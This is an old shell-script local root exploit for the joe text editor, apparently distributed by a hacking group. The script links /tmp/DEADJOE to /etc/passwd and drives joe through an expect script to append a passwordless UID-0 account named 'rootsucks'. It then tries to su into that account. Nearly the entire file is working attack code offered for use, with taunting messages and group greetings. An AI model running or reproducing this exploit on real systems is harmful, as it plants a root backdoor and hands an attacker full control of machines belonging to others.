#**********************************************************************#
#            DEADJOE SIMLINK ROOT eXPLOIT COd3D by dr_fdisk^           #
#**********************************************************************#
# dr_fdisk@raza-mexicana.org / dr_fdisk@y0ur-ass.org                   #
########################################################################


########################################################################
# GREATZ to:                                                           #
# RaZa MeXiCaNa TeAm ( w w w . r a z a - m e x i c a n a . o r g)      #
# HeRt Mx Security ( w w w . h e r t m x . o r g)                      #
# packetstorm, s0d team                                                #
# alt3kx -> (ctm) jeje , 0x90, dex,fatal,yield,trovalz,powertech,ca0s  #
# etc... todos la gente de ezkracho #                                  #
########################################################################
clear
echo
echo
echo "DEADJOE SIMLINK ROOT eXPLOIT by dr_fdisk^ "
echo "#########################################"
echo
echo "dr_fdisk@raza-mexicana.org    "
echo "-------------------------------"
echo "w w w . r a z a - m e x i c a n a . o r g "
echo "w w w . d r - f d i s k . r a z a - m e x i c a n a . o r g"
echo "------------------------------------------------------------"
echo
echo -n "CREANDO SIMLINKS: "
rm -rf /tmp/DEADJOE
ln -s /etc/passwd /tmp/DEADJOE
cd /tmp/
sleep 3
echo "LISTO!"
cat >/tmp/.own <<EL_FINAL
#!/usr/bin/expect -f
if {1} {
        set send_slow {1 .001}
        proc send {ignore arg} {
                sleep .1
exp_send -s -- "rootsucks::0:0:I've 0wned you asshole:/:/bin/sh "
}
}
puts "\n"
spawn joe /tmp/.hack
expect "New File"
send -- ""
puts "\n\n\n"
exit
EL_FINAL
echo -n "EXPLOTANDO: "
chmod +x /tmp/.own
/tmp/.own >/dev/null
rm /tmp/.own
echo "LISTO!"
sleep 1
echo "A VER SI FUNCO.... "
sleep 2
su - rootsucks
echo PARECE QUE NO! FUCK!
#############################################################################
#                              th3 3nd                                      #
#############################################################################

